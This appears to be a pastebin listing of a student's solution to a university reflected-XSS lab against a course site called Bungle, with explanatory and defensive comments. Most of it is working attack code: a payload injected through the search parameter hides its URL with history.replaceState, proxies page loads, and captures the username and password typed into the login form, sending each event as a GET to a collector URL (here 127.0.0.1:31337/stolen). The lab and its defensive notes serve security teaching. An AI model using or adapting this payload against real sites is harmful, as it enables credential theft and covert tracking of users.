
Untitled

a guest
Oct 5th, 2016
  1. <meta charset="utf-8">
  2. <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
  3. <script>
  // Extend this function:
  //
  // payload(attacker) is the script body that makeLink() injects into the
  // target's search page. As written it:
  //   - defines log(data), which prints $.param(data) to the console and sends
  //     the same data as a GET request to the `attacker` URL;
  //   - defines proxy(href), which loads `href` into the <html> element, shows
  //     the page again and reports a "nav" event carrying the URI;
  //   - hides the page, rewrites the address bar to "/" with
  //     history.replaceState so the injected query string is no longer visible,
  //     raises alert('go') (NOTE(review): looks like a debugging leftover), and
  //     proxies "./";
  //   - on DOM ready, hooks the click on #log-in-btn and reports the values of
  //     #username and #userpass as a "login" event.
  //
  // Defender's view: the observable traffic is a request to the search page
  // whose q parameter carries a <script> element, followed by GETs to a foreign
  // origin with event=nav / event=login and user/pass in the query string.
  // HttpOnly cookies do not help here, because the values are read from the
  // form fields. The relevant controls are output-encoding of the reflected
  // parameter and a Content-Security-Policy that disallows inline script and
  // restricts connect-src (presumably the search page echoes q unescaped; that
  // page is not shown here).
  //
  // makeLink() serializes this function with payload.toString(), so everything
  // between the braces, comments included, ends up in the generated URL. Notes
  // are therefore kept above the declaration rather than inside it.
  function payload(attacker) {
    function log(data) {
      console.log($.param(data))
      $.get(attacker, data);
    }
    function proxy(href) {
      $("html").load(href, function(){

        $("html").show();
        log({event: "nav", uri: href});
      });
    }
    $("html").hide();
    history.replaceState({}, "Bungle!", "/");
    alert('go');
    proxy("./");
    $(function(){
      $("#log-in-btn").click(function(e){
        log({event: "login", user: $("#username").val(), pass: $("#userpass").val()});
      });
    });
  }
  // Builds the demonstration link for the reflected-XSS exercise: the target's
  // search URL with payload()'s source text, followed by a call to it,
  // URL-encoded into the q parameter.
  //   xssdefense - defense level forwarded in the query string; only 0 is handled
  //   target     - base URL of the site whose search page is linked
  //   attacker   - URL passed as the argument of the injected payload() call
  // Returns the link as a string, or undefined for any non-zero defense level.
  //
  // Seen from the server side, the resulting request is a GET to the search
  // page whose q value decodes to a <script> element. That is a usable
  // signature for request logging, but encoding the output where q is
  // reflected is the actual fix.
  function makeLink(xssdefense, target, attacker) {
    if (xssdefense != 0) {
      // Left unimplemented in this listing: no link is built for non-zero
      // defense levels, so the caller receives undefined.
      return undefined;
    }

    // The tag delimiters are assembled from two pieces, presumably because this
    // code sits inside an inline <script> element and a literal closing tag in
    // the source would end that element early.
    var openTag = "<script" + ">";
    var closeTag = "</script" + ">";
    var injected = openTag + payload.toString() +
      ";payload(\"" + attacker + "\");" + closeTag;

    var searchBase = target + "./search?xssdefense=" + xssdefense.toString() + "&q=";
    return searchBase + encodeURIComponent(injected);
  }
  // Exercise configuration: the defense level to test, the site under test, and
  // the loopback URL that payload() sends its reports to.
  var xssdefense = 0;
  var target = "http://bungle-cs461.cs.illinois.edu/";
  var attacker = "http://127.0.0.1:31337/stolen";

  // The <h3> placeholder comes after this script in the document, so the link
  // is inserted only once the DOM is ready.
  $(document).ready(function () {
    var href = makeLink(xssdefense, target, attacker);
    // html() parses this string as markup and the URL is not attribute-escaped.
    // That holds up here only because the base URL and level are constants and
    // the q value has been through encodeURIComponent.
    var anchor = "<a target=\"run\" href=\"" + href + "\">Try Bungle!</a>";
    $("h3").html(anchor);
  });
  43. </script>
  44. <h3></h3>